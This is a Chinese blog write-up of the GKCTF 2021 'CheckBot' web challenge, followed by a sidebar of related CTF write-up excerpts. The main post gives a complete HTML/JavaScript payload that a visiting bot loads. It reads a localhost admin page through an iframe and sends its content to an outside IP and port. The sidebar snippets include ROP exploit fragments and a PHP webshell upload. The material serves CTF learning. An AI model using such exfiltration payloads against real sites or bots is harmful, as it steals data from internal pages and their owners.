[GKCTF 2021]CheckBot

最新推荐文章于 2023-02-27 11:17:38 发布
最新推荐文章于 2023-02-27 11:17:38 发布
阅读量2.8k 收藏 1
点赞数 1
分类专栏: csrf web学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/121504021
版权

[GKCTF 2021]CheckBot

这题一进去源代码处有提示,把uri通过post方式给它
在这里插入图片描述
在这里插入图片描述
在admin.php处发现flag,但应该要本地访问才行,这题bot会点击我们发过去的链接,那就整个csrf吧

把下面的代码放在自己的vps上,然后把网址发过去让bot去访问,bot访问后会把flag发到我们监听的端口这,就可以成功获取flag

<html>
        <body>
                <iframe id="flag" src="http://127.0.0.1/admin.php"></iframe>
                <script>
                        window.onload = function(){
                        /* Prepare flag */
                        let flag = document.getElementById("flag").contentWindow.document.getElementById("flag").innerHTML;
                        /* Export flag */
                        var exportFlag = new XMLHttpRequest();
                        exportFlag.open('get', 'http://42.193.22.50:6663/flagis-' + window.btoa(flag));
                        exportFlag.send();
                        }
                </script>
        </body>
</html>

在这里插入图片描述
这里发过去也提示了要等一会,这里确实得有点耐心
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
总结
这题考点是csrf,比较少见,这里贴个链接可以学习下CSRF

lmonstergg
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-[GKCTF 2021]0.03
m0_67507776的博客
05-09 621
1.打开得到一个压缩包文件和一个文本 2.先用VeraCrypt挂载输入密码 311223313313112122312312313311,密码不对 3.使用NtfsStreamsEditor2打开发现存在ntfs数据流隐写,导出文件 4.打开发现内容有点像密码表,结合secret.txt文件中的数字,推断为三分密码 5.解密得到明文:EBCCAFDDCE 6.将得到明文作为密码再次尝试Vera crypt挂载,得到flag ...
GKCTF2021 checkin
pondzhang的专栏
06-27 516
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
GKCTF2021_checkin
z1r0的博客
04-09 420
GKCTF2021_checkin 查看保护 简单题 有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li =
GKCTF2021部分wp
Dream的博客
06-28 950
Misc 签到 过滤http流量,找到cat /f4g的流量,再追踪http流,可以发现末尾有一串16进制数: 拿到这串十六进制数去解码,在base64解码得到: 我们可以看到这串“==QIhM0QDN0Q”的顺序反了,由此猜测我们要把这串编码全部反着来: a="wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD" b="jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDj
buuctf13(perl脚本GET open命令漏洞&redis主从复制&xss&ssti关键字过滤绕过&csrf)
weixin_63231007的博客
02-27 1128
[HITCON 2017]SSRFme & [网鼎杯 2020 玄武组]SSRFMe & [GWCTF 2019]mypassword & [GWCTF 2019]你的名字& [GKCTF 2021]CheckBot
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
GKCTF2020.zip
07-20
GKCTF2020 逆向 pwn等赛题,除web题外均有
葫芦侠一键签到网页版工具
05-16
功能介绍: +收集50+可签到板块 包含大量隐藏板块 +支持一键签到及托管签到 +支持托管记录查询 ...+支持自定义广告位、首页公告等. +支持自定义接口地址 +......安装教程:上传压缩包至根目录解压即可 ...
GKCTF2021 部分复现
Je3Z的博客
06-28 851
misc 0.03 用VeraCrypt加载输入密码 311223313313112122312312313311 所以我们需要真正的密码 所以说 311223313313112122312312313311应该是有意义的部分 通过扫描NTFS得到了secre.txt存在数据流 用AlternateStreamView导出 想个密码表 而且题目里多次提到3所以考虑将那堆数据按3位一组进行拆分 311 223 313 313 112 122 312 312 313 311 所有其有两种情况 得出的密码
[GKCTF 2021]checkin调试与分析
Tokameine的博客
07-23 1414
目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧 主要函数: int sub_4018C7() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF puts("Please Sign-in"); putchar(62); read(0, s1, 0x20uLL); puts("Please input u Pass"); putchar(62); read(0, buf, 0x28uLL); if ( str...
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4344
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
[GKCTF 2021]RRRRsa
weixin_51867782的博客
07-08 2983
复现[GKCTF 2021]RRRRsa 拿到题目后,准备操作,额,,, 看了看大佬的wp,恍然大悟,分享一下解题的思路。(部分题目如下) 一般看到这种像hint1的式子,都需要用gcd(,n)去分解出q或p。推导过程如下(官方题解) 推导过程需要用到二项式定理和费马定理。原理如下: 1)二项式定理: 2)费马定理:a^p = a mod p; 了解原理后,在看题解就容易多了。总结了一下: 1)拿到两个式子后,先把括号去掉,然后把常数项去掉; 2)之后得到的式子应该是俩个只含p或q的式子,让两个式子的p(
GKCTF2021 ✖ DASCTF应急挑战杯 部分WP
Le1a's Blog
06-27 1009
Misc 你知道apng吗 下载附件得到girl.apng,用apngdis_gui分解得到每一帧的png图片 分别在2,18,26发现二维码。其中18,26可以直接扫描得到-ad20和-0327-288a235370ea}。图片2是扭曲的二维码,但可以用ps拖正 扫描得到flag{a3c7e4e5,最后在第十张图片的红色通道1中得到二维码 扫描得到-9b9d,所以flag为 flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea} 银杏岛の奇妙冒险 下载附件,打开exe,
[GKCTF2021]复现wp
Huamang的博客
08-21 427
签到 打开流量包,分析http流 用python转成字符串 import binascii s = '64306c455357644251306c6e51554e4a5a3046355355737764306c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154576c44546d3952524
[GKCTF2020] web题-CheckIN
BROTHERYY的博客
07-29 576
复现环境:buuoj.cn 代码提示有eval函数可以执行base64加密代码 成功回显了phpinfo信息 编辑一句话上传 eval($_POST[1]); 根目录上有flag和readflag,但都没法访问,应该是权限不够 bypass disable_functions 该漏洞可以执行命令执行 exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php 上传到有权限的目录/tmp ?Ginkg
南邮CTF攻城记(4)Pass check
不忘初心,护天下安全!
12-04 673
Pass check Q: S:分析php代码可知,是用strcmp进行比较的,如果传入数组就返回0,经过非运算就可以置1  
Ctftool:CTF漏洞利用工具
weixin_43977912的博客
04-28 1647
Ctftool是一款交互式的命令行工具,可以帮助安全研究人员对CTF(Windows平台下用于实现文本服务的协议)进行安全测试。在Ctftool的帮助下,安全研究人员可以轻松对Windows内部运行和调试文本输入处理器的复杂问题进行分析,并检测目标Windows系统的安全性。 除此之外,Ctftool还允许研究人员根据自己的需要来编写一些简单的脚本来实现与CTF客户端或服务器端的自动化交互,以及执行简单的模糊测试任务。 工具下载 广大研究人员可以使用下列命令将项目源码克隆至本地: git clone htt
Java 反序列化漏洞-Apache Commons Collections3
cjdgg的博客
03-02 4671
Java 反序列化漏洞-Apache Commons Collections3前言javassist+TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 前言 之前已经学了CC1和CC2,接下来继续学习CC3。在CC2中我们用到了javassist修改字节码并配合TemplatesImpl攻击链来使用,因此我们很自然而然的想到,如果我们直接用javassist修改字节码并配合TemplatesImpl攻击链使用,就无需用I
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值